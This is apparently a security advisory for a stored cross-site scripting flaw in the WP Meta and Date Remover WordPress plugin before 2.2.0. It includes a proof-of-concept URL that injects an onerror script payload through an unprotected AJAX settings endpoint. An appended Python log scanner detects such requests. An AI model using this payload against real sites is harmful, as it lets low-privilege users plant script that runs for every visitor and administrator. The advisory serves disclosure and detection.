WPEX-ID:84F53E27-D8D2-4FA3-91F9-447037508D30 (wpexploit, dc11)
Oct 09, 2023 - 12:00 a.m.

WP Meta and Date Remover < 2.2.0 - Subscriber+ Stored XSS

Tags: stored xss, subscriber, url, ajax, frontend, backend, exploit

EPSS: 0.0004 (Low), percentile 14.2%

Description

The plugin provides an AJAX endpoint for configuring the plugin settings. This endpoint has no capability checks and does not sanitize user input, which is later output unescaped. This allows any authenticated user, such as a subscriber, to change the settings and perform Stored Cross-Site Scripting.

Note: A partial fix was released in v2.1.0, but stored XSS was still possible for users with Admin+ privileges.

Open the following URL when logged in as a subscriber:

`https://example.com/wp-admin/admin-ajax.php?action=update_settings&settings[removeByCSS]=true&settings[removeFromHome]=true&settings[cssCode]=</style><img src%3D1 onerror%3Dalert(document.domain)>`

The XSS will be triggered on any page (both frontend and backend).
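To check whether a site has already received such a request, the following added example (not part of the original advisory or the plugin's code) scans web server access logs for `update_settings` calls to `admin-ajax.php` and flags HTML markup in `settings[cssCode]`. It assumes combined log format and covers only the query-string form shown above, since request bodies are not logged; the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (combined log format); IPs, times and agents are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Oct/2023:10:01:12 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=update_settings&settings[removeByCSS]=true&settings[removeFromHome]=true'
    '&settings[cssCode]=%3C/style%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E'
    ' HTTP/1.1" 200 1 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [09/Oct/2023:10:05:40 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=update_settings&settings%5BcssCode%5D=.entry-meta%7Bdisplay%3Anone%7D'
    ' HTTP/1.1" 200 1 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [09/Oct/2023:10:06:02 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=heartbeat HTTP/1.1" 200 58 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Legitimate CSS never needs an HTML tag; "</style>" is what breaks out of the block.
MARKUP_RE = re.compile(r"</?\w")

def inspect_line(line):
    """Return a finding for an update_settings call seen in the query string, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    url = urlsplit(match.group("target"))
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    # parse_qs percent-decodes names and values, so encoded brackets and tags are caught.
    params = parse_qs(url.query, keep_blank_values=True)
    if "update_settings" not in params.get("action", []):
        return None
    css = " ".join(params.get("settings[cssCode]", []))
    return {
        "client": line.split(" ", 1)[0],
        "css_code": css,
        "markup_in_css": bool(MARKUP_RE.search(css)),
    }

def scan(lines):
    """Every settings change is worth reviewing; markup_in_css marks likely XSS."""
    return [f for f in map(inspect_line, lines) if f is not None]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because the endpoint has no capability check, a hit without markup is still worth comparing against who was expected to change the settings at that time.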
